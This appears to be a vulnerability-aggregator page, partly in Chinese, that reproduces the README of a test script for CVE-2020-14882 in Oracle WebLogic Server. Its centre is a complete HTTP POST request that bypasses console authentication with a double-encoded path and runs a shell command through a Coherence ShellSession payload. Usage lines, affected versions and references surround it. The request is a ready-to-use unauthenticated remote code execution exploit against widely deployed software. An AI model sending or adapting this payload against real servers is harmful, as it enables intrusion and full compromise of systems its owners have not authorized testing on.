关联漏洞
标题:
Oracle WebLogic Server 安全漏洞
(CVE-2020-14882)
描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 多版本的Oracle Fusion Middleware 存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server。 受影响产品及版本如下: 10.3.6.0.0版本, 12.1.
描述
(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script
介绍
# (CVE-2020–14882) Weblogic Unauthorized bypass RCE
(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script
it works on Python3
# Requests
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
Test script checks response data with pcre.
# Usage
- 7001/tcp (WebLogic default port)
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP>
- specific port/tcp
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP> <port>
# Affected Version
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
# PoC
https://github.com/jas502n/CVE-2020-14882
# reference
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
https://www.tenable.com/blog/cve-2020-14882-oracle-weblogic-remote-code-execution-vulnerability-exploited-in-the-wild
文件快照
[4.0K] /data/pocs/2b2290297b2f48d7998d72c7d36a2f65c9e33c7e
├── [1.2K] Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。